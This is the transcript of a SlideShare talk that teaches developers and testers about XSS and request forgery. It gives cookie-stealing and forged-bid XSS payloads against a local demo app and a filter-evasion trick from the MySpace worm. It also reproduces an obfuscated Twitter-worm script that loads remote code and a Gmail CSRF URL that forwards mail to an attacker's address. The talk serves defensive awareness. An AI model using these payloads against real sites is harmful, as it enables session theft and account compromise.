Your SlideShare is downloading. ×
0
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
VodQA3_PenetrationTesting_AmitDhakkad
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

VodQA3_PenetrationTesting_AmitDhakkad

586

Published on

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
586
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
4
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. AmitDhakad<br />Application Developer<br />Is considered a “survivor”<br />Likes To Read About Black Magic & Illusions<br />
  • 2. What, why and how’s ofPenetration Testing<br />- AmitDhakad<br />Developer<br />
  • 3. What do I plan to cover?<br />What is Penetration Testing?<br />XSS<br />What is it?<br />Types of XSS<br />Reflective XSS<br />Stored XSS<br />Request Forgery<br />What is it?<br />Types of Request Forgery<br />On-site request forgery <br />Cross-site request forgery<br />Demo<br />Attack mechanisms<br />Real world examples<br />Why do we need to pay attention?<br />
  • 4. Penetration Testing<br />Simulating a malicious attack on a system<br />
  • 5. Cross-site scripting (XSS)<br />Injecting javascript through user-controllable fields<br />
  • 6. Reflective XSS<br />Injecting javascript using url parameters<br />
  • 7. Diagram courtesy : The Web Application Hacker’s Handbook<br />
  • 8. Attack:http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)<br />
  • 9. Stored XSS<br />Exploiting server’s ability to persist<br />
  • 10. Diagram courtesy : The Web Application Hacker’s Handbook<br />
  • 11. Attack:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)<br />
  • 12. Request Forgery<br />Perform unwitting actions on behalf of the user<br />
  • 13. On-site Request Forgery (OSRF)<br />From same domain<br />
  • 14. Attack with XSS:Image url is set tohttp://www.myflorida.org.uk/images/disney_gif/Donald.gif“ onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();<br />
  • 15. Attack without XSS:Image url is set to /bids?bid[amount]=500&bid[auction_id]=1<br />
  • 16. Cross-site Request Forgery (CSRF)<br />From a different domain<br />
  • 17. Same origin policy<br />A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request.<br />A page residing on one domain can load a script from another domain and execute this within its own context.<br />
  • 18. What can you do with XSS and Request Forgery?<br />Session hijacking<br />Performing arbitrary actions<br />Disclosure of user data<br />
  • 19. Real world attacks<br />
  • 20. MySpace worm by Samy (XSS + OSRF)<br />Bypassed all filters and added a script to his profile<br />The script did two things:<br />Added the visiting user as a friend<br />The script got copied into the user’s profile<br />Anyone visiting the new infected user also got added as Samy’s friend.<br />
  • 21. <ul><li>Protection:
  • 22. MySpace strips out the word "onreadystatechange" which is necessary for XML-HTTP requests
  • 23. Attack:
  • 24. eval('xmlhttp.onread' + 'ystatechange = callback');</li></li></ul><li>Ebay – discovered by Dave Armstrong (OSRF)<br />Crafted url set as image url<br />Arbitrary bid was placed on behalf of the visiting user<br />
  • 25. Mikeyy twitter worm (XSS + OSRF)<br />Implemented by a 17-year old boy<br />"><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script><br />-- "<script src="http://www.stalkdaily.com/ajax.js"></script>"<br />Visiting user got infected<br />Infected users began twitting unwittingly.<br />
  • 26. Gmail vulnerability – discovered by PetkoPetkov (CSRF)<br />http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter<br />Add filter to forward all emails to the attacker’s email address<br />
  • 27. Why we need to pay attention?<br />Shift is towards attacking clients<br />Technologies don’t provide strong protection<br />Considered as lame attacks<br />Identification using automated tools is difficult<br />Penetration testing is considered as a separate vertical<br />
  • 28. Break your own walls before anyone else does it<br />
  • 29. Q & A<br />
  • 30. Thank you<br />

×